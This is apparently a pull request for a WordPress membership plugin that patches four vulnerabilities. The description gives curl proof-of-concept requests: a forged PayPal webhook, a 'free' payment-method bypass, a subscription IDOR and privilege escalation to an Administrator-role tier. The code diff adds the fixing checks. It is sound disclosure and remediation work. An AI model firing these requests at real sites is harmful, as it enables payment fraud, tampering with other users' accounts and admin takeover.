### PR TITLE
Fix/vulnerability v5.2.1

### DIFF
--- a/.github/sync-file-list.yml
+++ b/.github/sync-file-list.yml
@@ -1,4 +1,4 @@
-wpeverest/user-registration-pro@develop:
+wpeverest/user-registration-pro@fix/vulnerability-v5.2.1:
     - assets
     - includes
     - modules

--- a/.github/workflows/sync.yml
+++ b/.github/workflows/sync.yml
@@ -2,7 +2,7 @@ name: Sync Files To Pro
 on:
     push:
         branches:
-            - develop
+            - fix/vulnerability-v5.2.1
         workflow_dispatch:
 jobs:
     sync:

--- a/modules/membership/includes/Admin.php
+++ b/modules/membership/includes/Admin.php
@@ -381,6 +381,10 @@ if ( ! class_exists( 'Admin' ) ) :
 			// A paid/subscription membership must use one of its configured gateways; 'free'
 			// is never a valid gateway for a non-free membership.
 			if ( 'free' !== $membership_type ) {
+				if ( 'free' === $data['payment_method'] ) {
+					wp_delete_user( absint( $member_id ) );
+					wp_send_json_error( array( 'message' => esc_html__( 'Invalid payment method for this membership.', 'user-registration' ) ) );
+				}
 				$configured_gateways = array();
 				if ( ! empty( $membership_meta['payment_gateways'] ) && is_array( $membership_meta['payment_gateways'] ) ) {
 					foreach ( $membership_meta['payment_gateways'] as $gw_key => $gw_data ) {

--- a/modules/membership/includes/Admin.php
+++ b/modules/membership/includes/Admin.php
@@ -280,10 +280,12 @@ if ( ! class_exists( 'Admin' ) ) :
 				return $success_params;
 			}
 			// Guard 3: form has a membership field
-			$has_membership_field = false;
+			$has_membership_field  = false;
+			$membership_field_data = null;
 			foreach ( $valid_form_data as $field_data ) {
 				if ( isset( $field_data->extra_params['field_key'] ) && 'membership' === $field_data->extra_params['field_key'] ) {
-					$has_membership_field = true;
+					$has_membership_field  = true;
+					$membership_field_data = $field_data;
 					break;
 				}
 			}
@@ -304,6 +306,50 @@ if ( ! class_exists( 'Admin' ) ) :
 			$member_id = $user_id;
 			if ( ! $member ) {
 				return $success_params;
+			}
+
+			// Validate that the submitted membership ID is one the form is actually configured to offer.
+			// This prevents an attacker from supplying an off-form tier (e.g. Administrator-role) in members_data.
+			if ( $membership_field_data ) {
+				$listing_option         = isset( $membership_field_data->general_setting->membership_listing_option )
+					? $membership_field_data->general_setting->membership_listing_option
+					: 'all';
+				$allowed_membership_ids = array();
+
+				if ( 'group' === $listing_option ) {
+					$group_id = isset( $membership_field_data->general_setting->membership_group )
+						? absint( $membership_field_data->general_setting->membership_group )
+						: 0;
+					if ( $group_id ) {
+						$group_service     = new MembershipGroupService();
+						$group_memberships = $group_service->get_group_memberships( $group_id );
+						foreach ( $group_memberships as $m ) {
+							$id = isset( $m['ID'] ) ? (int) $m['ID'] : ( isset( $m['id'] ) ? (int) $m['id'] : 0 );
+							if ( $id ) {
+								$allowed_membership_ids[] = $id;
+							}
+						}
+					}
+				} elseif ( 'selected' === $listing_option ) {
+					$selected_ids           = isset( $membership_field_data->general_setting->membership_active_memberships )
+						? $membership_field_data->general_setting->membership_active_memberships
+						: array();
+					$selected_ids           = is_array( $selected_ids ) ? $selected_ids : (array) maybe_unserialize( $selected_ids );
+					$allowed_membership_ids = array_values( array_filter( array_map( 'absint', $selected_ids ) ) );
+				} else {
+					$membership_service_temp = new MembershipService();
+					foreach ( $membership_service_temp->list_active_memberships() as $m ) {
+						$id = isset( $m['ID'] ) ? (int) $m['ID'] : ( isset( $m['id'] ) ? (int) $m['id'] : 0 );
+						if ( $id ) {
+							$allowed_membership_ids[] = $id;
+						}
+					}
+				}
+
+				if ( ! empty( $allowed_membership_ids ) && ! in_array( absint( $data['membership'] ), $allowed_membership_ids, true ) ) {
+					wp_delete_user( absint( $member_id ) );
+					wp_send_json_error( array( 'message' => esc_html__( 'Invalid membership selection.', 'user-registration' ) ) );
+				}
 			}
 			$data['username'] = $member->user_login;
 			$data['email']    = $member->user_email;

--- a/modules/membership/includes/Admin.php
+++ b/modules/membership/includes/Admin.php
@@ -346,7 +346,7 @@ if ( ! class_exists( 'Admin' ) ) :
 					}
 				}
 
-				if ( ! empty( $allowed_membership_ids ) && ! in_array( absint( $data['membership'] ), $allowed_membership_ids, true ) ) {
+				if ( empty( $allowed_membership_ids ) || ! in_array( absint( $data['membership'] ), $allowed_membership_ids, true ) ) {
 					wp_delete_user( absint( $member_id ) );
 					wp_send_json_error( array( 'message' => esc_html__( 'Invalid membership selection.', 'user-registration' ) ) );
 				}

--- a/modules/membership/includes/Admin/Services/PaymentGatewaysWebhookActions.php
+++ b/modules/membership/includes/Admin/Services/PaymentGatewaysWebhookActions.php
@@ -274,9 +274,7 @@ class PaymentGatewaysWebhookActions {
 	/**
 	 * Verify PayPal webhook signature via the PayPal REST verification API.
 	 *
-	 * Fail-open when no webhook ID is stored (mirrors Stripe behaviour when
-	 * no webhook secret is configured), so existing sites are not broken before
-	 * credentials are saved for the first time.
+	 * Rejects the request when no webhook ID is configured (fail-closed).
 	 *
 	 * @param WP_REST_Request $request Request object.
 	 * @return bool
@@ -298,12 +296,11 @@ class PaymentGatewaysWebhookActions {
 		);
 
 		if ( empty( $webhook_id ) ) {
-			PaymentGatewayLogging::log_general(
+			PaymentGatewayLogging::log_error(
 				'paypal',
-				'PayPal webhook ID not configured — skipping signature verification (fail-open).',
-				'notice'
+				'PayPal webhook ID not configured — request rejected.'
 			);
-			return true;
+			return false;
 		}
 
 		$headers = array(

--- a/modules/membership/includes/Admin/Services/Paypal/NewPaypalService.php
+++ b/modules/membership/includes/Admin/Services/Paypal/NewPaypalService.php
@@ -315,7 +315,7 @@ class NewPaypalService {
 				array(
 					'ur-membership-return' => base64_encode( $query_args ),
 				),
-				apply_filters( 'user_registration_paypal_return_url', $paypal_options['return_url'], array() )
+				apply_filters( 'user_registration_paypal_return_url', home_url( '/' ), array() )
 			)
 		);
 
@@ -800,7 +800,11 @@ class NewPaypalService {
 		}
 
 		$payload = array(
-			'plan_id' => sanitize_text_field( $new_plan_id ),
+			'plan_id'             => sanitize_text_field( $new_plan_id ),
+			'application_context' => array(
+				'return_url' => $context['return_url'],
+				'cancel_url' => $context['cancel_url'],
+			),
 		);
 
 		if ( ! empty( $context['team_quantity'] ) ) {
@@ -1112,9 +1116,12 @@ class NewPaypalService {
 		$paypal_subscription_id = sanitize_text_field( isset( $_GET['subscription_id'] ) ? $_GET['subscription_id'] : '' ); // phpcs:ignore WordPress.Security.NonceVerification.Recommended
 		$member_subscription    = $this->members_subscription_repository->get_subscription_data_by_subscription_id( $member_order['subscription_id'] );
 		$is_renewing            = ! empty( $membership_process['renew'] ) && in_array( $member_order['item_id'], $membership_process['renew'], true );
+		$is_upgrading           = ! empty( $membership_process['upgrade'] ) && isset( $membership_process['upgrade'][ $url_params['current_membership_id'] ?? '' ] );
 		// Also treat as one-time if PayPal returned a token with no subscription_id (proration upgrade).
 		$is_rest_one_time_payment = ( 'paid' === $member_order['order_type'] || 'one-time' === $membership_type )
 			|| ( ! empty( $order_token ) && empty( $paypal_subscription_id ) );
+
+		$payment_verified = false;
 
 		// if buyer already returned and internal order is completed, just redirect .
 		// if ( 'completed' === ( isset( $member_order['status'] ) ? $member_order['status'] : '' ) ) {
@@ -1179,6 +1186,7 @@ class NewPaypalService {
 					JSON_PRETTY_PRINT
 				)
 			);
+			$payment_verified = true;
 		}
 
 		// REST subscription return.
@@ -1247,6 +1255,18 @@ class NewPaypalService {
 					JSON_PRETTY_PRINT
 				)
 			);
+			$payment_verified = true;
+		}
+
+		if ( ! $payment_verified && ! $is_upgrading ) {
+			PaymentGatewayLogging::log_error(
+				'paypal',
+				sprintf(
+					'[Member ID #%s] PayPal redirect aborted: no token or subscription_id present — possible forged return URL.',
+					$member_id
+				)
+			);
+			return;
 		}
 
 		// Reload local subscription after any update.
@@ -1258,8 +1278,6 @@ class NewPaypalService {
 		}
 
 		$this->send_payment_success_email( $member_order['ID'], $member_subscription, $membership_metas, $member_id, $membership_id );
-
-		$is_upgrading = ! empty( $membership_process['upgrade'] ) && isset( $membership_process['upgrade'][ $url_params['current_membership_id'] ] );
 
 		if ( $is_upgrading && ! empty( $member_subscription['ID'] ) ) {
 			PaymentGatewayLogging::log_general(

--- a/modules/membership/includes/Admin/Services/SubscriptionService.php
+++ b/modules/membership/includes/Admin/Services/SubscriptionService.php
@@ -461,6 +461,16 @@ class SubscriptionService {
 
 		$current_subscription_id                   = $data['current_subscription_id'];
 		$subscription                              = $this->subscription_repository->retrieve( $data['current_subscription_id'] );
+
+		if ( empty( $subscription ) || (int) $subscription['user_id'] !== get_current_user_id() ) {
+			return array(
+				'response' => array(
+					'status'  => false,
+					'message' => __( 'You do not have permission to upgrade this subscription.', 'user-registration' ),
+				),
+			);
+		}
+
 		$user                                      = get_userdata( $subscription['user_id'] );
 		$payment_method                            = $data['selected_pg'];
 		$membership                                = $this->membership_repository->get_single_membership_by_ID( $subscription['item_id'] );
@@ -470,6 +480,26 @@ class SubscriptionService {
 		$selected_membership_details               = wp_unslash( json_decode( $membership['meta_value'], true ) );
 		$selected_membership_details['post_title'] = $membership['post_title'];
 		$selected_membership_details['membership'] = $data['selected_membership_id'];
+
+		// Validate that the submitted payment method is one the destination membership actually supports.
+		if ( 'free' !== ( $selected_membership_details['type'] ?? '' ) ) {
+			$configured_gateways = array();
+			if ( ! empty( $selected_membership_details['payment_gateways'] ) && is_array( $selected_membership_details['payment_gateways'] ) ) {
+				foreach ( $selected_membership_details['payment_gateways'] as $gw_key => $gw_data ) {
+					if ( isset( $gw_data['status'] ) && 'on' === $gw_data['status'] ) {
+						$configured_gateways[] = $gw_key;
+					}
+				}
+			}
+			if ( ! empty( $configured_gateways ) && ! in_array( $payment_method, $configured_gateways, true ) ) {
+				return array(
+					'response' => array(
+						'status'  => false,
+						'message' => __( 'Invalid payment method for this membership.', 'user-registration' ),
+					),
+				);
+			}
+		}
 
 		$selected_membership_details['payment_method'] = $payment_method;
 		$membership_process                            = urm_get_membership_process( $user->ID );
@@ -739,6 +769,14 @@ class SubscriptionService {
 		}
 
 		$subscription                = $this->subscription_repository->retrieve( $data['current_subscription_id'] );
+
+		if ( empty( $subscription ) || (int) $subscription['user_id'] !== get_current_user_id() ) {
+			return array(
+				'status'  => false,
+				'message' => __( 'You do not have permission to upgrade this subscription.', 'user-registration' ),
+			);
+		}
+
 		$membership                  = $this->membership_repository->get_single_membership_by_ID( $data['selected_membership_id'] );
 		$selected_membership_details = wp_unslash( json_decode( $membership['meta_value'], true ) );
 


### PR DESCRIPTION
### All Submissions:

* [x] Have you followed the [User Registration Contributing guideline](https://github.com/wpeverest/user-registration/blob/master/.github/CONTRIBUTING.md)?
* [x] Does your code follow the [WordPress' coding standards](https://make.wordpress.org/core/handbook/best-practices/coding-standards/)?
* [x] Have you checked to ensure there aren't other open [Pull Requests](../pulls) for the same update/change?

<!-- Mark completed items with an [x] -->

<!-- You can erase any parts of this template not applicable to your Pull Request. -->

### Changes proposed in this Pull Request:
Vulnerabilities were reported and below are the details on how to replicate:
## 1. PayPal Webhook Signature Bypass (UR-4555 — fixed in develop)

**Pre-condition:** Membership module active, paid PayPal plan exists. Attacker has a pending order (sign up for the paid plan, stop before paying).

**Steps:**

1. Note your `member_id`, `membership_id`, and `subscription_id` from the signup response.
2. Send a forged webhook:

`curl -X POST 'https://TARGET/?rest_route=/user-registration/paypal-webhook' \
  -H 'Content-Type: application/json' \
  -d '{
    "event_type": "PAYMENT.CAPTURE.COMPLETED",
    "resource": {
      "id": "FAKE-TXN-001",
      "purchase_units": [{
        "custom_id": "<membership_id>-<member_id>-0-<subscription_id>"
      }]
    }
  }'`

1. **Expected (vulnerable):** HTTP 200 `{"success":true}` — order flips to `completed`, subscription becomes `active`, no payment made.
2. **Expected (fixed):** HTTP 401 / permission denied.

---

## 2. Payment Method Bypass via `payment_method: "free"` (UR-4556 — fixed in develop)

**Pre-condition:** Membership module active, paid plan (e.g. PayPal, $99) with a non-Subscriber role (e.g. Contributor). Public registration form with that plan.

**Steps:**

1. Load the public registration form page, copy the `security` nonce, `form_id`, and `ur_frontend_form_nonce`.
2. Submit registration with `payment_method: "free"` in `members_data`:

`curl -X POST 'https://TARGET/wp-admin/admin-ajax.php' \
  --data 'action=user_registration_user_form_submit' \
  --data 'security=<NONCE>' \
  --data 'form_id=<FORM_ID>' \
  --data 'members_data={"membership":"<PAID_PLAN_ID>","payment_method":"free","username":"testuser","email":"test@test.com","password":"Pass123!"}'`

1. **Expected (vulnerable):** Registration succeeds, user created with Contributor role, no payment collected, no PayPal redirect.
2. **Expected (fixed):** Error — "Invalid payment method for this membership."

---

## 3. Subscriber-Level Upgrade IDOR (NEW — fixed in this session)

**Pre-condition:** Two membership tiers with different roles, upgrade path configured between them. Attacker is logged in as a Subscriber with their own subscription. Victim is any other member.

**Steps:**

1. Log in as Subscriber. Get `urm_upgrade_membership` nonce from the membership listing page.
2. Find or enumerate the victim's `subscription_id` (sequential integer).
3. Submit the upgrade action against the victim's subscription:

`curl -X POST 'https://TARGET/wp-admin/admin-ajax.php' \
  -b 'wordpress_logged_in_...=<ATTACKER_COOKIE>' \
  --data 'action=user_registration_membership_upgrade_membership' \
  --data 'security=<NONCE>' \
  --data 'current_subscription_id=<VICTIM_SUB_ID>' \
  --data 'selected_membership_id=<DEST_TIER_ID>' \
  --data 'current_membership_id=<SOURCE_TIER_ID>' \
  --data 'selected_pg=free'`

1. **Expected (vulnerable):** Response contains victim's `member_id`/`username`. Victim's role and subscription tier rewritten. Attacker's account unchanged.
2. **Expected (fixed):** Error — "You do not have permission to upgrade this subscription."

---

## 4. Off-Form Membership Tier Privilege Escalation (NEW — fixed in this session)

**Pre-condition:** Two published membership tiers — Tier A (Subscriber role, on the form) and Tier B (Administrator role, NOT on the form). Public registration form showing only Tier A.

**Steps:**

1. Load the registration form page. Copy `security` nonce, `form_id`, `ur_frontend_form_nonce`.
2. Submit registration with Tier A's ID in `form_data` but **Tier B's ID** in `members_data.membership`:

`curl -X POST 'https://TARGET/wp-admin/admin-ajax.php' \
  --data 'action=user_registration_user_form_submit' \
  --data 'security=<NONCE>' \
  --data 'form_id=<FORM_ID>' \
  --data 'ur_frontend_form_nonce=<FRONTEND_NONCE>' \
  --data 'form_data=[{"field_name":"user_login","value":"attacker"},{"field_name":"user_email","value":"attacker@test.com"},{"field_name":"user_pass","value":"Pass123!"},{"field_name":"<MEMBERSHIP_FIELD_NAME>","value":"<TIER_A_ID>"}]' \
  --data 'members_data={"membership":"<TIER_B_ADMIN_ID>","payment_method":"free","username":"attacker","email":"attacker@test.com","password":"Pass123!"}' \
  --data 'is_membership_active=<TIER_A_ID>' \
  --data 'membership_type=<TIER_A_ID>'`

1. **Expected (vulnerable):** Registration succeeds. New account holds the Administrator role. Auto-login cookie returned if enabled.
2. **Expected (fixed):** Error — "Invalid membership selection." User is deleted.

### How to test the changes in this Pull Request:

1. Switch to this branch and test the vulnerability fixes.
2. The fixes mainly affect payment from paypal and overall upgrade and purchase membership process, verify if they are working properly.

### Types of changes:

* [x] Bug fix (non-breaking change which fixes an issue)
* [ ] Enhancement (modification of the currently available functionality)
* [ ] New feature (non-breaking change which adds functionality)
* [ ] Breaking change (fix or feature that would cause existing functionality to change)

<!-- Mark completed items with an [x] -->

### Other information:

* [ ] Have you added an explanation of what your changes do and why you'd like us to include them?
* [ ] Have you successfully ran tests with your changes locally?
* [ ] Have you updated the documentation accordingly?

<!-- Mark completed items with an [x] -->

### Changelog entry

> Fix - Webhook not configured but still can bypass PayPal payments.
> Fix - Payment method field during registration could be manipulated to bypass payment for paid memberships.
> Fix - Authenticated users could modify other members' subscriptions by supplying an arbitrary subscription ID during upgrade.
> Fix - Membership tier submitted during registration was not validated against the memberships configured on the form, allowing substitution with an off-form tier.